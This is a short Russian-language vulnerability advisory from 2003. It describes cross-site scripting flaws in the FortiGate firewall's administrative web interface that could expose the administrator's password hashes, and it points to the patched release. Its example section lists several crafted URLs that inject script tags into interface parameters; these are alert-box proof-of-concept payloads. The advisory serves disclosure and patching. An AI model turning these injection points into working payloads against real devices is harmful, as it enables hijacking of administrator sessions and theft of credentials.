Дата публикации: | 13.11.2003 |
Всего просмотров: | 1261 |
Опасность: | Низкая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: FortiGate Firewall до версии 2.50 maintenance release 4;
Описание: Две уязвимости обнаружены в FortiGate firewall в административном Web интерфейсе устройства. Удаленный пользователь может выполнить XSS нападение против firewall администратора. Успешное нападение позволяет удаленному пользователю получить md5 хеши пароля администратора Пример/Эксплоит: https://172.16.1.254/firewall/policy/dlg?q=-1&fzone=t<script>alert('oops')</script>>&tzone=dmz https:/ /172.16.1.254/firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('oops')</script> https://172.16.1.254/antispam/listdel?file=blacklist&name=b<script>alert('oo ps')</script>&startline=0 https://172.16.1.254/antispam/listdel?file=whitelist&name=a<script>alert('oops')</script>&startline=0(naturally) http://172.16.1.254/theme1/se lector?button=status,monitor,session"><script>alert('oops')</script>&button_url=/system/status/status,/ http://172.16.1.254/theme1/selector?button=status,monitor,session &button_url=/system/status/status"><script>alert('oops')</script>,/ http://172.16.1.254/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/s ystem/status/moniter"><script>alert(' http://172.16.1.254/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/s tatus/session&quo&; URL производителя: http://www.fortinet.com/products Решение:Установите обновленную версию программы (Fortinet OS (2.50 MR5). |
|
Ссылки: | vulnerabilities in fortigate webinterface |